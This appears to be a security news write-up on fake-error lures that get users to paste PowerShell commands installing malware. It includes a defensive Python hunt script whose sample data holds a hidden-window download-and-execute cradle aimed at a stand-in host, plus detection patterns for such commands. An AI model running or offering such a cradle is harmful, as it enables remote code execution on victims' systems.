Image – Bleeping Computer 

Recent cyber attacks have employed a clever social engineering technique to trick users into running malicious PowerShell scripts on their computers. Multiple threat actors, including the notorious TA571 spam group and a cluster named “ClearFake”, have been using fake browser and document errors to deploy various malware payloads. 

The Attack Vector  

The attacks begin with users either visiting a compromised website or receiving a malicious HTML attachment pretending to be a Word document or file hosted on OneDrive. The malicious code on the webpage or within the HTML file displays a realistic-looking error message stating there is a problem with Google Chrome, Word, or OneDrive. 

Fake Google Chrome error 
Source: Proofpoint

The fake error messages instruct the user to apply a “fix” by copying a PowerShell script to the clipboard and pasting it into the PowerShell terminal or the Windows Run dialog, then running it. When executed, the PowerShell script starts a chain of events that downloads and installs malware on the victim’s system. 

Malware Payloads  

The PowerShell scripts have been observed deploying a range of malicious payloads, including: 

  • DarkGate backdoor 
  • Matanbuchus malware loader 
  • NetSupport remote access tool (RAT) 
  • Amadey bot/loader 
  • XMRig crypto miner 
  • Clipboard hijackers redirecting crypto transactions 
  • Lumma info-stealer

The payloads allow the attackers to gain remote control, steal data, mine cryptocurrencies, and perform other malicious activities on the compromised systems. 

Clever Social Engineering 

While the attack requires user interaction to succeed, the social engineering makes it deceptively convincing. The fake error messages mimic legitimate warnings and present both a perceived problem and its solution in a single display, which pushes users to act quickly before they consider the risks. 

Furthermore, because the malicious code is run directly from the clipboard rather than from an executable file, it may bypass file-based protections that scan for and block malware on disk. 
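Because nothing is written to disk, the place to catch this chain is process-creation telemetry: PowerShell launched from the Run dialog or a console (so its parent is explorer.exe or Windows Terminal) with a command line that hides its window and downloads and evaluates code. The hunt below is an added example, not code from the original article or from Proofpoint; it runs over constructed stand-ins for Windows process-creation records (Security 4688 or Sysmon Event ID 1), the indicator table and the `example.invalid` URL are assumptions for illustration, and the base64 string is a constructed dummy.

```python
import re
from dataclasses import dataclass
from typing import Optional

# Constructed stand-in for a Windows process-creation record (Security 4688 or
# Sysmon Event ID 1); only the three fields the hunt needs are modelled.
@dataclass
class ProcessEvent:
    parent_image: str   # process that spawned PowerShell
    image: str          # the PowerShell binary itself
    command_line: str   # full command line as logged

# Parents that mean a person typed or pasted the command: the Run dialog is
# hosted by explorer.exe, a console opened from the Start menu is also a child
# of explorer.exe, and Windows Terminal hosts pasted-in sessions.
INTERACTIVE_PARENTS = {"explorer.exe", "windowsterminal.exe"}
POWERSHELL_IMAGES = {"powershell.exe", "pwsh.exe"}

# Command-line traits a pasted "fix" needs in order to fetch and run a payload
# without leaving a scanned file on disk (assumed indicator set).
INDICATORS = {
    "hidden_window":   re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "encoded_command": re.compile(r"-e(?:nc(?:odedcommand)?)?\s+[A-Za-z0-9+/=]{20,}", re.I),
    "download_cradle": re.compile(
        r"\b(?:DownloadString|DownloadFile|Invoke-WebRequest|iwr|irm|Net\.WebClient)\b", re.I),
    "inline_eval":     re.compile(r"\b(?:iex|Invoke-Expression)\b", re.I),
    "clipboard_read":  re.compile(r"\bGet-Clipboard\b", re.I),
    "policy_bypass":   re.compile(r"-e(?:xecutionpolicy|p)\s+bypass", re.I),
}


def matched_indicators(command_line: str) -> list:
    """Names of every indicator present in the command line, in table order."""
    return [name for name, rx in INDICATORS.items() if rx.search(command_line)]


def assess(event: ProcessEvent) -> Optional[dict]:
    """Return an alert dict for a suspicious PowerShell launch, else None."""
    if event.image.lower() not in POWERSHELL_IMAGES:
        return None
    hits = matched_indicators(event.command_line)
    if not hits:
        return None
    user_launched = event.parent_image.lower() in INTERACTIVE_PARENTS
    # One indicator suffices when a person launched PowerShell from the Run
    # dialog or a console. Launches by services or the task scheduler need two,
    # so a routine "-ExecutionPolicy Bypass -File job.ps1" does not alert.
    if user_launched or len(hits) >= 2:
        return {"parent": event.parent_image,
                "indicators": hits,
                "user_launched": user_launched}
    return None


def hunt(events) -> list:
    """Run assess() over a batch of events and keep only the alerts."""
    return [alert for alert in (assess(e) for e in events) if alert]


# Constructed sample telemetry: one pasted-in download cradle, one harmless
# console start, one scheduled admin script, one encoded command from Run.
SAMPLE_EVENTS = [
    ProcessEvent("explorer.exe", "powershell.exe",
                 'powershell.exe -w hidden -ep bypass -c "iex (New-Object Net.WebClient)'
                 ".DownloadString('http://example.invalid/fix.ps1')\""),
    ProcessEvent("explorer.exe", "powershell.exe", "powershell.exe"),
    ProcessEvent("svchost.exe", "powershell.exe",
                 r"powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\nightly-backup.ps1"),
    ProcessEvent("explorer.exe", "powershell.exe",
                 "powershell.exe -enc QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB"),
]

if __name__ == "__main__":
    for alert in hunt(SAMPLE_EVENTS):
        print(alert)
```

Run against the constructed batch, the hunt flags the two explorer.exe-spawned launches and stays quiet on the plain console start and the scheduled backup job. The parent-process context is what keeps the rule usable: the same cradle switches are common in legitimate automation, so the bar is lowered only where a human pasted the command, which is exactly the path these fake-error prompts rely on.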

Protect Yourself 

To avoid falling victim to these attacks, treat any prompt to copy, paste and run a command with suspicion, even when it appears to come from a trusted source such as the operating system or productivity software. Double-check the validity of such warnings through official support channels before following the instructions. 

Maintain updated security software, browse the web cautiously, and think critically before enabling any suspicious scripts, downloads, or programs. User education is crucial to identify and report these social engineering attempts. 

If you suspect your system has been compromised, immediately disconnect from the network, run anti-malware scans, and contact cyber security professionals to remediate the infection. 

Stay vigilant against evolving cyber threats that employ clever tactics to bypass security measures. With proper awareness and precautions, you can protect yourself and your organisation from malware deployment schemes abusing trusted system utilities.